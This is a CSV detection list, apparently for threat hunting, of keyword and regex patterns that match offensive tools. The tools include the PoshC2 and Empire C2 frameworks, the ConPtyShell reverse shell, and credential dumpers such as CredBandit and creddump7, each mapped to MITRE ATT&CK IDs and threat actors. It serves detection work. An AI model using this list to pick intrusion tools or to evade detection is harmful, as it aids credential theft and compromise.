"*createnewshellcode*",".{0,1000}createnewshellcode.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39013"
"*CreateObject(""""W""""+""""S""""+""""cr""""+""""ip""""+""""t.""""+""""S""""+""""h""""+""""e""""+""""l""""+""""l""""*",".{0,1000}CreateObject\(\""W\""\+\""S\""\+\""cr\""\+\""ip\""\+\""t\.\""\+\""S\""\+\""h\""\+\""e\""\+\""l\""\+\""l\"".{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","39014"
"*createpbindpayload*",".{0,1000}createpbindpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39015"
"*createproxypayload -*",".{0,1000}createproxypayload\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39016"
"*createproxypayload*",".{0,1000}createproxypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39017"
"*CreatePseudoConsole function found! Spawning a fully interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\sfound!\sSpawning\sa\sfully\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","39018"
"*CreatePseudoConsole function not found! Spawning a netcat-like interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\snot\sfound!\sSpawning\sa\snetcat\-like\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","39019"
"*Create-SQLFileCLRDll*",".{0,1000}Create\-SQLFileCLRDll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","39020"
"*Create-SQLFileXpDll*",".{0,1000}Create\-SQLFileXpDll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","39021"
"*CreateStringPayload(""RULER"")*",".{0,1000}CreateStringPayload\(\""RULER\""\).{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","39022"
"*Create-SuspendedWinLogon*",".{0,1000}Create\-SuspendedWinLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","39023"
"*CreateTokenClient.exe *",".{0,1000}CreateTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","39024"
"*CreateTokenDrv_x64.sys*",".{0,1000}CreateTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","39025"
"*Create-WinLogonProcess*",".{0,1000}Create\-WinLogonProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","39026"
"*create-workspace.py -E docker -P*/pupyws*",".{0,1000}create\-workspace\.py\s\-E\sdocker\s\-P.{0,1000}\/pupyws.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","39027"
"*Creating a TGT ticket for the user*",".{0,1000}Creating\sa\sTGT\sticket\sfor\sthe\suser.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","39028"
"*Creating DigitalOcean OVPN Proxy tab*",".{0,1000}Creating\sDigitalOcean\sOVPN\sProxy\stab.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","39029"
"*Creating offline copies of the LSASS process to perform memory dumps on*",".{0,1000}Creating\soffline\scopies\sof\sthe\sLSASS\sprocess\sto\sperform\smemory\sdumps\son.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","39030"
"*credBandit * output*",".{0,1000}credBandit\s.{0,1000}\soutput.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","0","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","39032"
"*credBandit.*",".{0,1000}credBandit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","39033"
"*credBanditx64*",".{0,1000}credBanditx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","39034"
"*creddump.py*",".{0,1000}creddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","39035"
"*creddump7 -*",".{0,1000}creddump7\s\-.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","39036"
"*creddump7.exe*",".{0,1000}creddump7\.exe.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","39037"
"*creddump7.win32.*",".{0,1000}creddump7\.win32\..{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","39038"
"*Credential Guard bypass might fail if RunAsPPL is enabled*",".{0,1000}Credential\sGuard\sbypass\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","39039"
"*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*",".{0,1000}CredentialAccess_CredentialDumping_BrowserDataCSharp\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39040"
"*CredentialAccess_CredentialDumping_KiwiOnLocal.py*",".{0,1000}CredentialAccess_CredentialDumping_KiwiOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39041"
"*CredentialAccess_CredentialDumping_SunLogin.py*",".{0,1000}CredentialAccess_CredentialDumping_SunLogin\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39042"
"*CredentialAccess_CredentialDumping_WindowsHashDump.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsHashDump\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39043"
"*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsWDigestEnable\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39044"
"*CredentialAccess_CredentialInFiles_BrowserData.py*",".{0,1000}CredentialAccess_CredentialInFiles_BrowserData\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39045"
"*CredentialAccess_CredentialInFiles_WindowsSoftware.py*",".{0,1000}CredentialAccess_CredentialInFiles_WindowsSoftware\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39046"
"*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*",".{0,1000}CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39047"
"*CredentialKatz*",".{0,1000}CredentialKatz.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","39048"
"*Credentials Found in Configurations!*",".{0,1000}Credentials\sFound\sin\sConfigurations!.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","39049"
"*Credentials*hekatomb_*.txt",".{0,1000}Credentials.{0,1000}hekatomb_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","39050"
